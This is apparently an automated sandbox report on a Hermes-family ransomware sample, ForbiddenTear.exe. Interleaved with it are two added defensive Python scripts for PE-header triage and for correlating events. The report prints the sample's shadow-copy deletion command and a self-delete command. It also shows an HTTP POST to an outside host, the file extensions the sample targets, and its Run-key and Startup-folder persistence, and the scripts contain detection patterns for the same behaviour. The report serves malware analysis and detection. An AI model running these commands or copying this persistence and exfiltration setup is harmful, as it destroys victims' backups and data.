
Analysis Report ForbiddenTear.exe

Overview

General Information

Sample Name: ForbiddenTear.exe
Analysis ID: 325968
MD5: 8ad3b3c4396af8f9661168f4d3fda7a4
SHA1: 3ffa8a86cb8b7f65f319dab071a1ad3ffb5fe7dc
SHA256: 75574b8553f0c59e2d26cafd3cf92fe38eb815d6f11a3473cdb39741bbda72fd

Detection

Hermes
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Hermes Ransomware
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
HTTP GET or POST without a user agent
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Spawns drivers
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • ForbiddenTear.exe (PID: 5660 cmdline: 'C:\Users\user\Desktop\ForbiddenTear.exe' MD5: 8AD3B3C4396AF8F9661168F4D3FDA7A4)
    • cmd.exe (PID: 5564 cmdline: 'cmd' /C vssadmin Delete Shadows /All /Quiet MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • sihost.exe (PID: 204 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 4916 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 5080 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 2792 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 412 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • sihost.exe (PID: 4920 cmdline: sihost.exe MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
  • ctfmon.exe (PID: 764 cmdline: ctfmon.exe MD5: D4DAF47FBF707B23B874DE6F139CB0C7)
  • cdd.dll (PID: 4 cmdline: MD5: 9455C42505ABA9DAE97F7D5F507B2570)
  • LogonUI.exe (PID: 4912 cmdline: 'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d MD5: 3AAD3281A2953F4DDA09D7EE5BEE8BA6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: ForbiddenTear.exe
Rule: MAL_RANSOM_COVID19_Apr20_1
Description: Detects ransomware distributed in COVID-19 theme
Author: Florian Roth
Strings:
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Dropped Files

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc
Rule: MAL_RANSOM_COVID19_Apr20_1
Description: Detects ransomware distributed in COVID-19 theme
Author: Florian Roth
Strings:
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Memory Dumps

Source: Process Memory Space: ForbiddenTear.exe PID: 5660
Rule: JoeSecurity_Hermes
Description: Yara detected Hermes Ransomware
Author: Joe Security

Unpacked PEs

Source: 0.2.ForbiddenTear.exe.370000.0.unpack
Rule: MAL_RANSOM_COVID19_Apr20_1
Description: Detects ransomware distributed in COVID-19 theme
Author: Florian Roth
Strings:
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Source: 0.0.ForbiddenTear.exe.370000.0.unpack
Rule: MAL_RANSOM_COVID19_Apr20_1
Description: Detects ransomware distributed in COVID-19 theme
Author: Florian Roth
Strings:
  • 0x7629f:$op2: 60 2E 2E 2E AF 34 34 34 B8 34 34 34 B8 34 34 34
  • 0x75c27:$op3: 1F 07 1A 37 85 05 05 36 83 05 05 36 83 05 05 34

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: ForbiddenTear.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | Avira: detection malicious, Label: HEUR/AGEN.1121252
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: ForbiddenTear.exe | Virustotal: Detection: 54%
Source: ForbiddenTear.exe | ReversingLabs: Detection: 50%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ForbiddenTear.exe | Joe Sandbox ML: detected
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: POST /write.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: wzl.pagekite.me Content-Length: 840 Expect: 100-continue Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: wzl.pagekite.me
Source: unknown | HTTP traffic detected: POST /write.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: wzl.pagekite.me Content-Length: 840 Expect: 100-continue Connection: Keep-Alive

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Hermes Ransomware
Source: Yara match | File source: Process Memory Space: ForbiddenTear.exe PID: 5660, type: MEMORY
Deletes shadow drive data (may be related to ransomware)
Source: ForbiddenTear.exe | Binary or memory string: /C vssadmin Delete Shadows /All /Quiet
Source: ForbiddenTear.exe, 00000000.00000002.245698955.0000000000860000.00000004.00000020.sdmp | Binary or memory string: C:\Windows\C:\Windows\SYSTEM32\cmd.exe"cmd" /C vssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\cmd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\Ap
Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | Binary or memory string: cmdM/C vssadmin Delete Shadows /All /Quiet5/C timeout 2 && Del /Q /F
Source: ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmp | Binary or memory string: l&/C vssadmin Delete Shadows /All /Quiet
Source: ForbiddenTear.exe, 00000000.00000002.246406289.0000000002848000.00000004.00000001.sdmp | Binary or memory string: l&/C vssadmin Delete Shadows /All /Quiett
Source: ForbiddenTear.exe, 00000000.00000002.246406289.0000000002848000.00000004.00000001.sdmp | Binary or memory string: l."cmd" /C vssadmin Delete Shadows /All /Quiet
Detected potential crypto function
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_00B0C174
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_00B0E5B0
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_00B0E5A0
PE file contains strange resources
Source: ForbiddenTear.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: servicesmc.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: ForbiddenTear.exe | Binary or memory string: OriginalFilename vs ForbiddenTear.exe
Source: unknown | Driver loaded: C:\Windows\System32\cdd.dll
Source: ForbiddenTear.exe, type: SAMPLE | Matched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc, type: DROPPED | Matched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
Source: 0.2.ForbiddenTear.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
Source: 0.0.ForbiddenTear.exe.370000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | Binary or memory string: .sh.sln
Source: classification engine | Classification label: mal100.rans.adwa.winEXE@12/5@1/1
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
Source: ForbiddenTear.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ForbiddenTear.exe | Virustotal: Detection: 54%
Source: ForbiddenTear.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File read: C:\Users\user\Desktop\ForbiddenTear.exe
Source: unknown | Process created: C:\Users\user\Desktop\ForbiddenTear.exe 'C:\Users\user\Desktop\ForbiddenTear.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
Source: unknown | Process created: C:\Windows\System32\sihost.exe sihost.exe (6 identical entries)
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\ctfmon.exe ctfmon.exe
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Process created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ForbiddenTear.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ForbiddenTear.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
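The static PE facts the report lists for this sample (a read/execute .text section, a populated IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, which is what marks a .NET assembly, and the NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE and NX_COMPAT DllCharacteristics) and the "non-matching file extension" signature raised on the dropped servicesmc file can all be checked from the PE headers without running anything. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses those header fields from raw bytes, and the image it is run on is a header-only PE32 constructed inside the script to carry the same flags the report shows (it is not the real binary). The PE_EXTENSIONS allow-list and the cmd-style flag names are assumptions of the example.

```python
"""Header-level PE triage: is it a PE, is it .NET (CLR header present),
which DllCharacteristics mitigations are set, and how are its sections
flagged. Added example; not from the Joe Sandbox report."""
import ntpath
import struct

DLL_CHARACTERISTICS = {          # IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF spec)
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SECTION_FLAGS = {                # IMAGE_SCN_* bits
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
# Assumption: extensions under which a PE image is "expected"; anything else is a mismatch.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def triage_pe(data: bytes) -> dict:
    """Parse DOS/NT headers; returns {'is_pe': False} for anything that is not a PE image."""
    try:
        if data[:2] != b"MZ":
            return {"is_pe": False}
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return {"is_pe": False}
        coff = e_lfanew + 4
        _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directories at +96
            ndirs_off, dirs_off = opt + 92, opt + 96
        elif magic == 0x20B:      # PE32+: 64-bit ImageBase/stack/heap fields shift them
            ndirs_off, dirs_off = opt + 108, opt + 112
        else:
            return {"is_pe": False}
        dllchar = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
        ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
        clr_rva = clr_size = 0
        if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
            clr_rva, clr_size = struct.unpack_from(
                "<II", data, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
        sections = []
        hdr = opt + opt_size
        for _ in range(nsections):
            name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
            chars = struct.unpack_from("<I", data, hdr + 36)[0]
            sections.append((name, sorted(n for bit, n in SECTION_FLAGS.items() if chars & bit)))
            hdr += 40
    except struct.error:          # truncated header: not a usable PE
        return {"is_pe": False}
    return {
        "is_pe": True,
        "pe32plus": magic == 0x20B,
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "dll_characteristics": sorted(n for bit, n in DLL_CHARACTERISTICS.items() if dllchar & bit),
        "sections": sections,
        # code that is also writable is a classic packer / self-modifying tell
        "writable_code": any("IMAGE_SCN_MEM_EXECUTE" in f and "IMAGE_SCN_MEM_WRITE" in f
                             for _, f in sections),
    }


def extension_mismatch(path: str, data: bytes) -> bool:
    """True when the bytes are a PE image but the file name does not say so
    (the dropped 'servicesmc' in this report has no extension at all)."""
    return triage_pe(data)["is_pe"] and ntpath.splitext(path)[1].lower() not in PE_EXTENSIONS


def build_sample_pe(dllchar: int, dotnet: bool) -> bytes:
    """Constructed, header-only PE32 image for testing (not the real sample, not runnable)."""
    img = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", img, 0x3C, 0x40)                          # e_lfanew
    img += b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)   # i386, 1 section, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<H", opt, 70, dllchar)
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    if dotnet:                                                        # CLR header directory present
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    img += opt
    # .text: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, 2x pointers, 2x counts, flags
    img += b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x1000, 0x2000, 0x1000, 0x200, 0, 0, 0, 0, 0x60000020)
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample_pe(0x8540, True)   # DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE
    print(triage_pe(sample))
    dropped = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc"
    print("extension mismatch:", extension_mismatch(dropped, sample))
```

On a real sample, read the file with `open(path, "rb").read()` and pass it to `triage_pe`; the `.text` section in this report is flagged read/execute only, so `writable_code` stays False, while a populated COM descriptor directory is what tells you to reach for a .NET decompiler rather than a native disassembler.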
    Source: Binary string: qrcodepmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: MCIMPP.pdb"" source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: 3difr.pdb== source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: qrcodepmp.pdb$$ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: Accessibility.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: SaveAsRTF.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: drvSOFT.pdb66 source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: WindowsMedia.pdb++ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: WindowsMedia.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: tesselate.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: 2d.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: drvSOFT.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: PerfInst.pdb1 source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Multimedia.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: prcr.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: Flash.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb source: ForbiddenTear.exe, 00000000.00000002.255988303.000000000A094000.00000004.00000001.sdmp
    Source: Binary string: Annots.pdb source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp
    Source: Binary string: 3difr.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: datamatrixpmp.pdb((4 source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: .db.dbf.mdb.pdb.sql.dwg.dxf.sxc.ots source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp
    Source: Binary string: Spelling.pdbSS( source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: Spelling.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: MakeAccessible.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Multimedia.pdb& source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: AdobeLinguistic.pdbQQ source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: Reflow.pdbRR source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: PDDom.pdbiiH source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: SaveAsRTF.pdbUU source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Accessibility.pdbpp source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: D:\garuda_1890\esg\lilo\plugins\AdobeHunspellPlugin\6.1\binaries\VC.Net2010\Win32\Release\AdobeHunspellPlugin.pdb source: ForbiddenTear.exe, 00000000.00000002.259066936.000000000A73A000.00000004.00000001.sdmp
    Source: Binary string: Flash.pdb++ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: MCIMPP.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: ForbiddenTear.exe, 00000000.00000002.255929783.000000000A031000.00000004.00000001.sdmp
    Source: Binary string: QuickTime.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: datamatrixpmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: pdf417pmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: rt3d.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: .db.dbf.mdb.pdb.sql.dwg.dxf.asp source: ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmp
    Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
    Source: Binary string: Reflow.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: pdf417pmp.pdb$$ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: PDDom.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: AdobeLinguistic.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: drvDX9.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: PerfInst.pdb source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C322DB push ds; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C322E7 push ds; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C32244 push ds; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C3225F push ds; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C3220F push ds; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Code function: 0_2_04C3222C push 0000001Ch; ret
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc

    Boot Survival:

Drops PE files to the startup folder
Source: C:\Users\user\Desktop\ForbiddenTear.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Service
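The two Boot Survival findings (a PE dropped into the per-user Startup folder and a value written under HKEY_CURRENT_USER\...\CurrentVersion\Run), together with the earlier 'cmd' /C vssadmin Delete Shadows /All /Quiet child process, are exactly the three events a detection engineer would correlate: destroying recovery data plus persisting is the ransomware pattern this report scores as mal100. The script below is an added example of that correlation and is not the sandbox's own detection logic. It runs over constructed Sysmon-style events modelled on this report's process tree (EventID 1 process create, 11 file create, 13 registry value set; the notepad.exe event is an invented benign control), and attributing a cmd.exe or powershell.exe /C wrapper to its parent process is a heuristic of this example, not something the report states.

```python
"""Correlate shadow-copy deletion with startup persistence across Sysmon-style
events. Added example, not part of the Joe Sandbox report."""
import re
from collections import defaultdict

# Constructed events modelled on the report's process tree (not real telemetry).
EVENTS = [
    {"EventID": 1, "ProcessId": 5564, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\ForbiddenTear.exe",
     "CommandLine": r"cmd /C vssadmin Delete Shadows /All /Quiet"},
    {"EventID": 11, "ProcessId": 5660, "Image": r"C:\Users\user\Desktop\ForbiddenTear.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc"},
    {"EventID": 13, "ProcessId": 5660, "Image": r"C:\Users\user\Desktop\ForbiddenTear.exe",
     "TargetObject": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Service",
     "Details": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc"},
    # benign control: an editor saving a document (constructed)
    {"EventID": 11, "ProcessId": 4321, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\user\Documents\notes.txt"},
]

# vssadmin[.exe] ... delete ... shadows, in any case, with any switches in between
SHADOW_DELETE = re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
WRAPPERS = ("\\cmd.exe", "\\powershell.exe")   # assumption: shells used only as /C launchers here


def actor(ev: dict) -> str:
    """Attribute an event to the interesting process: a cmd/powershell wrapper is
    charged to its parent, since the parent is what chose to delete the shadow copies."""
    img = ev["Image"]
    if img.lower().endswith(WRAPPERS) and ev.get("ParentImage"):
        return ev["ParentImage"]
    return img


def analyze(events) -> dict:
    """Map each actor image to the sorted list of technique tags observed for it."""
    findings = defaultdict(set)
    for ev in events:
        eid = ev["EventID"]
        if eid == 1 and SHADOW_DELETE.search(ev.get("CommandLine", "")):
            findings[actor(ev)].add("shadow_copy_deletion")
        elif eid == 11 and STARTUP_DIR.search(ev.get("TargetFilename", "")):
            findings[actor(ev)].add("startup_folder_drop")
        elif eid == 13 and RUN_KEY.search(ev.get("TargetObject", "")):
            findings[actor(ev)].add("run_key_persistence")
    return {img: sorted(tags) for img, tags in findings.items()}


def ransomware_suspects(events) -> list:
    """Actors that both destroy recovery data and persist: the combination seen in this report."""
    return sorted(img for img, tags in analyze(events).items()
                  if "shadow_copy_deletion" in tags
                  and {"startup_folder_drop", "run_key_persistence"} & set(tags))


if __name__ == "__main__":
    for img, tags in analyze(EVENTS).items():
        print(img, tags)
    print("suspects:", ransomware_suspects(EVENTS))
```

Each rule on its own is noisy (administrators do run vssadmin, and installers do write Run values); the value is in the join on the actor image, which is why the wrapper attribution matters: without it the shadow deletion would be credited to cmd.exe and never line up with the persistence events from the parent.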

    Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon (5001).png
Source: C:\Users\user\Desktop\ForbiddenTear.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
Source: ForbiddenTear.exe | Binary or memory string: vmware-converter-a
Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
